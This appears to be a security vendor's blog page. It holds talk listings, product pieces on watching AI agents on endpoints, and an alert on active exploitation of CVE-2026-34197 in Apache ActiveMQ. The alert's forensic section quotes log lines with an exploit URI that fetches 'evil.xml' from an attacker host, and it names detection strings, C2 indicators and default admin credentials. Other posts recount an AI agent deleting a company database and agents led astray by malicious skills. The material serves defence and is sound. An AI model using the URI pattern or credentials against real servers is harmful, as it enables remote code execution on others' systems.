😓:Sorry your JavaScript is off or your browser does not support JavaScript 😓
Start Trial

Resources

Blogs

TeamT5 Global Speaking Engagements [2025]
TeamT5 Global Speaking Engagements [2025]

TeamT5 actively shares its latest research findings and threat intelligence at international cybersecurity conferences, industry forums, and technical communities. This page provides a year-by-year archive of our public speaking engagements, highlighting TeamT5's research contributions and ongoing collaboration with the global cybersecurity community. Date Event Topic Speaker Jan. 21-22 JSAC (Japan) Evolution of Huapi Malware: Growing Focus on Edge Devices Yi-Chin Chuang (CTI Researcher), Yu-Tung Chang (CTI Researcher) Apr. 15-17 CYBERSEC (Taiwan) Kimsuky's Ongoing Evolution: Adapting Attack Strategies in Modern Environments Neo Chen (CTI Researcher) No Hunt, No Insight: Threat Hunting Techniques Based on MDR Experience LiYu (Project Manager), Kai (Security Engineer) OffSec Cert:from 0 to 0.5 Jason3e7 (Cyber Security Researcher) The Art of EDR Detection: Strengthening Detection Capabilities Through Evasion Techniques Zeze (Research Engineer), LiYu (Project Manager) How to Enhance Cybersecurity Incident Response Capabilities and Improve Incident Handling Maturity DM Wang (Product Manager) From Boot to Breach: Analyzing UEFI Bootkit Attack Techniques Zeze (Research Engineer) Exploring Network Device Vulnerabilities and Their Link to Attackers Jill Liu (Project Manager), Jason3e7 (Cyber Security Researcher) Jun. 10 The Hague Threat Intelligence Exchange (HagueTIX2025) (Netherlands) KnockHuoDuo Unmasked: The Fruit of China's Evolving Zero-Day Exploitation Strategy Greg Chen (Vulnerability Researcher), Yi-Chin Chuang (Cyber Threat Researcher), Charles Li (Chief Analyst) Sept. 24 Virus Bulletin (Germany) Google Calendar as C2 infrastructure: a China-nexus campaign with stealthy tactics Tim Chen (Cyber Threat Researcher), Still Hsu (Cyber Threat Researcher) Oct. 15~17 CyberCon Melbourne (Australia) Fraud and exploitation in China's global e-commerce boom Li-an Huang (CTI Analyst), Linda Kuo (Senior Threat Intelligence Analyst) Nov. 18~19 Code Blue (Japan) Bypassing Anti-Debugging: A Hybrid Real-Simulated Approach to Rootkit Analysis Yong-Xu Yang, Heng-Ming Fan, Yu Xuan Luo

TeamT5 Global Speaking Engagements [2026]
TeamT5 Global Speaking Engagements [2026]

TeamT5 actively shares its latest research findings and threat intelligence at international cybersecurity conferences, industry forums, and technical communities. This page provides a year-by-year archive of our public speaking engagements, highlighting TeamT5's research contributions and ongoing collaboration with the global cybersecurity community. Date Event Topic Speaker Jan. 21-23 JSAC (Japan) Incident Response at the Edge: Unmasking the Massive Exploitation of Ivanti Greg Chen (Vulnerability Researcher), Sharon Liu (Incident Response Engineer) May 5-7 CYBERSEC (Taiwan) Operation TradeBait: A Phantom Deal, A Real Cyber Trap Tay Cheng (CTI Researcher), Jessica Fang (CTI Analyst) Practical Implementation of SEMI E187/E188 Standards:Consistent Security Assessment and Application for the Semiconductor Supply Chain DM Wang (Product Manager) Clean Redirects, Dirty SYSTEM: Bug Hunting by Abusing File Operations for Silent Privilege Escalation Sharkkcode (Research Engineer) May 6-8 PIVOTcon (Spain) Know Thy Network, Because They Already Do: A Case Study of SLIME27's Campaign against Telecoms Silvia Yeh (Cyber Threat Intelligence Analyst), Rax Chuang (Cyber Threat Researcher) May 19-20 CyberSec MY (Malaysia) The Evolving Cybersecurity Landscape in APAC: Real-World Threat Cases from Malaysia John Lu (Assistant Vice President,Global Engagement) June 15-19 FIRST Annual Conference (USA) Short Videos, Crypto, and Crime: Inside the Chinese-Speaking Malware Ecosystem Linda Kuo (Senior Threat Intelligence Analyst), Li-an Huang (CTI Analyst)

Limited Resources, Endless Threats: Why You Need Intelligence-Driven Security Decisions
Products & Services
Limited Resources, Endless Threats: Why You Need Intelligence-Driven Security Decisions

Cyber risk is no longer shaped only by isolated vulnerabilities or opportunistic attacks. State-sponsored activity, ransomware operations, exploitation of exposed infrastructure, and abuse of trusted supply chain channels are converging into a more complex threat landscape. This is especially visible across APAC, where critical sectors including government, infrastructure, and IT/technology providers remain recurring targets, while attackers continue to refine their methods to bypass conventional defenses. For CISOs and security leaders, the challenge is not simply that threats are increasing. The harder question is how to determine which threats are relevant to the organization, which risks require immediate action, and where security investment can most effectively reduce exposure. Decision barriers in cyber defense Many organizations already have security tools, vulnerability data, and alerting systems. What they often lack is the attacker context needed to understand the full picture of an attack: why they may be targeted, how attackers are likely to operate, and where the organization may be most exposed. These barriers usually appear in four ways: Ambiguous risk assessment : Without knowing why the organization is being targeted, teams may struggle to evaluate which risks are most relevant. Dispersed investment : Without a clear view of truly critical assets, defensive resources may be spread too thin. Ineffective initial response : Without understanding attacker methods and behaviors, frontline teams may lose time deciding what to investigate or contain. Missed signs : Without monitoring aligned to real attack traces, early signs are easier to miss, increasing the risk of delayed detection and wider impact. In other words, the issue is not only a lack of information. It is the inability to turn threat context into timely judgment. When that happens, defense remains reactive. From attack understanding to defensive priorities To move earlier, organizations need to understand how attackers progress and where defenders can intervene. Intelligence should not be treated as a static list of indicators. Its value comes from helping teams understand how attacks are prepared, delivered, sustained, and eventually turned into business impact. An attacker-view approach makes defensive action more focused. Intelligence can help leaders reassess exposure when certain sectors or environments are being researched. It can guide security teams toward likely attack paths when specific delivery methods, malware families, or exploited weaknesses appear repeatedly. It can also help SOC teams refine monitoring when command-and-control patterns or related traces are observed. The goal is to make intelligence usable before an incident escalates, not only after damage has occurred. How threat intelligence supports security decisions Threat intelligence becomes valuable when it helps teams move from awareness to action. The following use cases show how intelligence supports decisions across different levels of security operations. 1. Executive reporting Translate geopolitical risk, attacker activity, and sector exposure into leadership-ready priorities for monitoring, investment, and risk planning. 2. Security improvement and vulnerability prioritization Go beyond severity scores by using exploitation evidence, threat activity, and business relevance to decide which weaknesses should be addressed first. 3. SOC and IR enablement Apply IoCs, TTPs, hunting hypotheses, and detection logic to strengthen SIEM monitoring, improve triage, and support faster initial response. 4. Incident hypothesis building Use attacker context and related campaign intelligence to narrow likely intrusion paths, affected scope, and containment priorities during early investigation. ThreatVision supports this approach by bringing together threat landscape context, attacker behavior, technical indicators, and monitoring insights into a practical decision foundation. This helps teams turn fragmented intelligence into focused action, from executive reporting and prioritization to detection, investigation, and response. Focus is the foundation of proactive defense No organization can respond to every threat with the same level of urgency. Proactive defense starts with focus: knowing which threats are most relevant, which assets require attention, and which actions can reduce risk before the organization is forced into a reactive position. Threat intelligence provides that focus by helping security leaders understand how attackers operate, recognize relevant risks earlier, and direct limited resources toward the decisions that matter most.

When AI Starts Executing Commands: How Can Enterprises Gain Visibility into Endpoint Behavior?
Products & Services
When AI Starts Executing Commands: How Can Enterprises Gain Visibility into Endpoint Behavior?

As generative AI and automation technologies continue to evolve rapidly, more enterprises are adopting various AI agents for software development, operations, task automation, and data processing. These AI agents are capable of proactively executing tasks, such as: Executing system commands Accessing local files and internal data Calling APIs and interacting with external services Autonomously planning and completing multi-step operations based on user instructions As AI becomes directly involved in system operations, a new challenge is emerging: Do enterprises truly have visibility into the security risks posed by AI agents on endpoints? The Visibility Challenges Introduced by AI Agents Under traditional endpoint monitoring architectures, security teams are typically able to observe: Which processes are running on systems Whether suspicious programs or abnormal activities are present Changes in file and network behaviors However, the characteristics of AI agents introduce new visibility challenges: AI agent behavior originates from natural-language prompts A single task may translate into multiple system operations Behaviors are continuous and highly automated As a result, organizations should begin asking: How many AI agents are currently operating on endpoints? Are they accessing sensitive data? Are there any abnormal or unintended behaviors occurring? From System Behavior to AI Behavior: The Evolution of Monitoring Requirements As AI agents become more prevalent, the focus of endpoint monitoring is gradually expanding from traditional system behaviors to AI-driven operational behaviors. This shift does not replace existing cybersecurity mechanisms; rather, it adds a new layer of visibility focused on understanding - What is the AI doing? How is it interacting with the system? The key transformation lies in extending visibility from process-level monitoring to command-level visibility and control. This enables enterprises to: Observe the actual commands executed by AI agents Analyze whether behavioral patterns are abnormal Establish behavioral profiles for AI agents Three Key Capabilities for AI Agent Visibility To effectively manage environments where AI agents operate, enterprises should establish the following capabilities: 1. Visibility Identify the presence and activities of AI agents on endpoints Avoid the presence of Shadow AI in the field Understand executed commands and operational workflows 2. Behavior Analysis Detect anomalous command patterns Identify potentially risky behaviors, such as unauthorized access to sensitive data 3. Security Control Integrate with existing security tools to build a comprehensive defense architecture ThreatSonar Plus: Enhancing Visibility and Detection for AI Agent Behavior To address the growing need for AI agent behavior monitoring, TeamT5 introduces ThreatSonar Plus -Extensive Endpoint Assessment Platform , helping enterprises extend their existing endpoint protection frameworks with deeper visibility into AI agent operations. ThreatSonar Plus provides the following core capabilities: 1. AI Agent Behavior Visualization Identify AI agent activity on endpoints Trace executed commands and operational workflows 2. Command-level Detection Analyze commands executed by AI agents Identify abnormal or potentially risky operational patterns 3. Behavioral Analysis Help security teams quickly understand incident context Please note that ThreatSonar Plus primarily focuses on detection and analysis capabilities, providing comprehensive visibility and contextual insights. Through one-time environment scanning and assessment, enterprises can gain a full understanding of AI agent deployments within their environments, helping identify: Unauthorized AI agent deployments Unauthorized command execution behaviors For organizations requiring real-time blocking and protection capabilities, organizations can also deploy ThreatSonar Anti-Ransomware - Endpoint Detection & Response Platform to enhance protection. Together, they provide a complete endpoint security workflow: Behavior Detection → Risk Assessment → Real-time Protection. Endpoint Security Thinking in the AI Era AI agents are gradually becoming critical operational entities within enterprises, evolving from simple assistant tools into active system participants with operational capabilities. As a result, endpoint security priorities must also evolve: Organizations must not only monitor systems and processes, but also understand and control AI behavior itself. By improving visibility into AI agents and strengthening behavioral analysis capabilities, enterprises can maintain operational control and security while adopting AI technologies. Both ThreatSonar Plus -Extensive Endpoint Assessment Platform and ThreatSonar Anti-Ransomware - Endpoint Detection & Response Platform are designed to help enterprises establish a more comprehensive and continuously evolving endpoint protection foundation for the AI era. Contact us to strengthen your cybersecurity resilience in the age of AI.

Alert: Exploitation of CVE-2026-34197 in Apache ActiveMQ
Threat Intelligence
Alert: Exploitation of CVE-2026-34197 in Apache ActiveMQ

The following blog post is based on our 2026 April H2 Vulnerability Insights Report. TeamT5 Vulnerability Research Team is dedicated to providing timely mitigation and response guidelines to critical vulnerabilities. Contact us for more information about our vulnerability intelligence. Active Exploitation of CVE-2026-34197 in Apache ActiveMQ TeamT5 has detected that a critical vulnerability (CVE-2026-34197) in Apache ActiveMQ has been actively exploited by threat actors, including the China-nexus APT SLIME88. Our investigation revealed that after exploitation, SLIME88 deployed SoxAgent RAT to compromise Linux devices and build an ORB network. We currently track the ORB network under the temporary name, GOBLIN14. The earliest SLIME88 attack can be traced back to April 7, shortly after the vulnerability was disclosed. The victims of SLIME88’s campaign included IT and manufacturing entities in the US, as well as entities in South Korea, India, France, and the US. We conclude the affected entities in Exploitation Status below. Executive Summary We assessed the severity of CVE-2026-34197 as critical and advised our customers to use this report to mitigate the impact. CVE-2026-34197 is a remote code execution (RCE) vulnerability in Apache ActiveMQ, an open-source Java message broker widely used in enterprise environments, across financial institutions, healthcare sector, governments, and more. Threat actors would send a crafted HTTP request to Apache ActiveMQ's Jolokia API endpoint, triggering the ActiveMQ broker to fetch a malicious XML configuration file from the C2 server and ultimately resulting in remote code execution. Although CVE-2026-34197 requires authentication, default credentials ( admin/admin ) are common in many cases. On some versions of Apache ActiveMQ, actors can exploit CVE-2024-32114[1] to bypass authentication. Apache disclosed CVE-2026-34197 on April 7 with mitigation information[2]. Public report indicated the vulnerability had been detected prior to the disclosure[3]. A proof-of-concept (PoC) exploit subsequently became publicly available,[4] and threat actors were observed exploiting the vulnerability in the wild shortly after disclosure.[5] Based on our investigation and current exploitation status of CVE-2026-34197, we depicted the Forensic Artifacts in this report and prepared a comprehensive Mitigation and Response Advisory for our customers. The Mitigation and Response Advisory includes: Official Information Related Indicators of Compromise of this vulnerability. Threat Hunting Tool: Log parsers to analyze ActiveMQ broker log produced by the exploitation of CVE-2026-34197 Exploitation Status CVE-2026-34197 has been actively exploited by threat actors, including the Chinese APT SLIME88. The victims included IT and manufacturing entities in the US, as well as entities in South Korea, India, France, and the US. China-nexus SLIME88[6] exploited CVE-2026-34197 to implant SoxAgent on Apache ActiveMQ entity. After receiving the crafted HTTP request, the victim host would fetch a malicious XML payload[7] from the C2 to exploit CVE-2026-34197, resulting in remote code execution. Afterwards, the actor deployed a download script[8] for SoxAgent. The C2 of the download script is 103.201.131.121. We detected sample of SoxAgent[9]. The C2s of SoxAgent are www.fastsecurey.info and 103.201.131.121. The victims included IT and manufacturing entities in the US, as well as entities in South Korea, India, France, and the US. We assessed that SLIME88 sought to compromise these devices with SoxAgent to build an ORB network, which we currently track as GOBLIN14. All malicious indicators associated with CVE-2026-34197 are summarized in the IoC section of this report. The full list can be downloaded via download page of ThreatVision. Mitigation and Response Advisory 1. Official Information Apache patched CVE-2026-34197 in ActiveMQ Classic Version 6.2.3 and 5.19.4 , released respectively on March 30 and 31. We highly recommend our clients and partners apply the patch as soon as possible. https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt 2. Mitigation It is recommended to change the default credentials (e.g. admin/admin ) and restrict access to Jolokia ( /api/jolokia ) and the Web Console, as these management interfaces expose sensitive broker operations. 3. Threat Hunting Tools CVE-2026-34197 has been actively exploited by threat actors. Our vulnerability team provided log parsers to analyze broker logs produced by the exploitation of CVE-2026-34197. The tools can also be downloaded from ThreatVision Threat Hunting Tools . Forensic Artifacts Threat actors would send a crafted HTTP request to Apache ActiveMQ’s Jolokia API endpoint. After receiving the request, the ActiveMQ broker would then process a malicious URI embedded in the HTTP request and retrieve a remote XML configuration file from the C2 server, triggering the exploitation of CVE-2026-34197 and ultimately achieving remote code execution. Therefore, we recommend using the log parser[10] to check the ActiveMQ broker log ( activemq.log ) for URIs containing vm:// and ?brokerConfig , which may indicate exploitation attempts. - Below is an example of a broker log produced by the exploitation of CVE-2026-34197: 2026-04-27 08:44:38,999 | INFO | Establishing network connection from vm://localhost to vm://evil?brokerConfig=xbean:http://<REDACTED>/evil.xml | org.apache.activemq.network.DiscoveryNetworkConnector | qtp504006221-38 2026-04-27 08:44:39,028 | WARN | Could not connect to remote URI: vm://evil?brokerConfig=xbean:http://<REDACTED>/evil.xml: The configuration has no BrokerService instance for resource: xbean:http://<REDACTED>/evil.xml | org.apache.activemq.network.DiscoveryNetworkConnector | qtp504006221-38 2026-04-27 08:44:39,029 | INFO | Network Connector DiscoveryNetworkConnector:NC:BrokerService[localhost] started | org.apache.activemq.network.NetworkConnector | qtp504006221-38 In some cases, the ActiveMQ broker may attempt to reconnect to the C2 server indefinitely. Each retry would attempt to re-fetch the malicious XML configuration file, generating failure errors in activemq.log . The error logs will contain Failed to load URL and connection error , which also serves as forensic artifacts of exploitation attempts. - Below is an example of the error log: 2026-04-27 08:50:10,379 | ERROR | Failed to load: URL [http://<REDACTED>/evil.xml], reason: IOException parsing XML document from URL [http://<REDACTED>/evil.xml]; nested exception is java.net.ConnectException: Connection refused (Connection refused) | org.apache.activemq.xbean.XBeanBrokerFactory | ActiveMQ Task-11 org.springframework.beans.factory.BeanDefinitionStoreException: IOException parsing XML document from URL [http://<REDACTED>/evil.xml]; nested exception is java.net.ConnectException: Connection refused (Connection refused) at org.springframework.beans.factory.xml.XmlBeanDefinitionReader.loadBeanDefinitions(XmlBeanDefinitionReader.java:342) at org.springframework.beans.factory.xml.XmlBeanDefinitionReader.loadBeanDefinitions(XmlBeanDefinitionReader.java:310) at org.apache.xbean.spring.context.ResourceXmlApplicationContext.loadBeanDefinitions(ResourceXmlApplicationContext.java:116) Appendix I: Malware Table Malware Table introduces the malware mentioned in this report. Name Type Description Used by First Seen SoxAgent RAT SoxAgent is a Linux backdoor that silently converts compromised hosts into SOCKS5 relay nodes. It maintains a persistent reverse connection to a hardcoded C2, negotiates AES-encrypted tunnels dynamically, and forwards TCP traffic through the victim to conceal attacker origin. Its supporting capabilities include remote update, self-deletion, and heartbeat reporting with falsified tunnel metrics. SLIME88 2026.04 Appendix II: Other critical CVEs TeamT5 also provides Patch Management Report (PMR) . Published every week (or more), the PMR will provide our customers with concise yet comprehensive updates on the most critical and exploitable vulnerabilities selected by TeamT5 vulnerability research team during the period. Each vulnerability will be provided with patch information. If you are interested in subscribing to this new report series, please contact TeamT5 for more information . Reference [1] CVE-2024-32114 is a vulnerability in Apache ActiveMQ Classic versions 6.0.0 through 6.1.1 which exposes the Jolokia API endpoint without authentication, allowing unauthenticated actors to interact directly with broker management operations. https://nvd.nist.gov/vuln/detail/cve-2024-32114 [2] Apache ActiveMQ Security Advisory for CVE-2026-34197 https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt [3] 10 Minutes with Claude: Remote Code Execution in Apache ActiveMQ (CVE-2026-34197) https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/ [4] Proof of Concept (PoC) of CVE-2026-34197: https://github.com/DEVSECURITYSPRO/CVE-2026-34197 [5] Apache.ActiveMQ.CVE-2026-34197.Code.Injection https://www.fortiguard.com/encyclopedia/ips/60672 [6] SLIME88 is a China-nexus APT. SLIME88 has targeted Taiwan’s energy sector through phishing emails and fake certificate installer, attempting to deploy backdoor programs such as AdaptixC2 and CobaltStrike. SLIME88 often uses Cloudflare to hide the real C2 IP address in order to evade tracking by researchers. [7] SHA-256: c5eacffa5c909209f97f720740802024761c432e8ebbd2d6e5b30fe0e79e19de [8] SHA-256: 968ec5e0c4aa7e15f0a04c5e7f96393aa7cbf12d2125dfe7dd20351408dd0615 [9] SHA-256: 60521e103bb134aea3169da6d3dfdcdae8e4d5e82df265a377b648bae39aca5f

When the “Claw” Goes Rogue: Using Endpoint Assessment to Cut Off Emerging AI Risks
Products & Services
When the “Claw” Goes Rogue: Using Endpoint Assessment to Cut Off Emerging AI Risks

A recent incident in which an AI agent deleted an entire company database and its backups without human confirmation sparked broad discussion[1]. Although the company had set rules such as “Do not run destructive commands” and “Do not make irreversible decisions independently,” the AI agent still went out of control and caused serious consequences. As AI moves beyond responding to prompts and begins calling tools, accessing data, and executing system operations, organizations need to look beyond whether the AI itself is secure and examine what the AI can actually do on endpoints. AI agents have become a new attack surface AI agents differ from general AI tools in that they do not simply respond to instructions; they can also reason, plan, select tools, and execute tasks. When “language” becomes an interface for triggering tool use and system operations, risk no longer stays within the prompt itself. It may also emerge as the AI agent interprets tasks, selects tools, or processes data. In other words, the points where attackers can intervene have expanded from a single input to the entire workflow an AI agent follows to complete a task. Tool descriptions and outputs, external skills, plugins, and the broader AI ecosystem can all influence an AI agent’s judgment and behavior. The abuse of the OpenClaw ecosystem also shows that skill supply chains and tool ecosystems can become potential security gaps.[2] When malicious content is embedded in external skills or tools, a seemingly normal workflow may be redirected toward unexpected execution results. What makes this more challenging is that the execution process of an AI agent may not always be fully traceable. Once a task produces an unexpected outcome, accountability can also become difficult to determine. As AI agents begin executing tasks in real operating environments, their impact may extend to endpoint data, credentials, configurations, and permissions. If an agent is affected by hidden instructions or malicious skills while also gaining access to API keys, database credentials, or other sensitive information, originally controlled data access or system operations may turn into unpredictable behavior. To gain a complete view of endpoint and AI agent risks, organizations can use standardized assessment to examine their environments through four steps: Asset inventory : Identify endpoint devices, systems, and AI agent deployment and usage. Risk identification : Detect vulnerabilities, misconfigurations, and potential AI agent risks. Risk prioritization : Determine remediation priorities based on severity. Response decision : Use risk insights and remediation guidance to support follow-up actions. This process helps organizations assess endpoint risks in a consistent way and turn assessment results into a practical basis for vulnerability remediation, resource allocation, and management decisions. ThreatSonar Plus: Eliminating security blind spots through automated risk assessment ThreatSonar Plus is a comprehensive endpoint risk assessment platform that enables organizations to perform a one-time assessment to inventory assets, detect risks, and support risk evaluation. It helps organizations address emerging risks in endpoint environments as AI agents become part of daily operations. Its assessment scope includes: Comprehensive asset and AI agent inventory : Inventories endpoint devices, operating systems, applications, and AI agent deployment and usage, providing visibility into asset distribution and AI agent usage for subsequent risk analysis and management. AI agent risk assessment : Assesses AI agent risks related to sensitive data exposure, malicious skill detection, hidden command analysis, and least privilege control, including whether API keys, credentials, sensitive data, hidden commands, malicious actions, or excessive permissions are present. Vulnerability detection and risk assessment : Maps assets to CPEs and correlates them with CVE databases to provide vulnerability insights and risk references, helping organizations identify high-risk software, operating system versions, or endpoint devices. Security configuration and compliance assessment : Assesses system settings against CIS benchmarks to verify security baseline compliance, and supports SEMI E187 Compliance Assessment across operating systems, network security, endpoint protection, and security monitoring. Manage endpoint “claw” risks early AI agents are quickly becoming part of enterprise environments. While they bring convenience and efficiency, they also introduce new risks to endpoint security. With ThreatSonar Plus, organizations can gain clearer visibility into endpoint conditions, identify and manage potential risks earlier, and build a cyber defense approach that keeps pace with fast-changing technologies and operating environments. Source: [1] https://www.aol.com/entertainment/dangerous-ai-escapes-deletes-entire-131400323.html [2] https://www.ithome.com.tw/news/173735 ThreatSonar Plus - Extensive Endpoint Assessment Platform can help you! Built on asset inventory, risk detection, and AI agent identification, ThreatSonar Plus enables organizations to gain visibility into critical assets and AI agent deployments, uncover security gaps across endpoints, software, and AI agents, and prioritize remediation based on risk severity.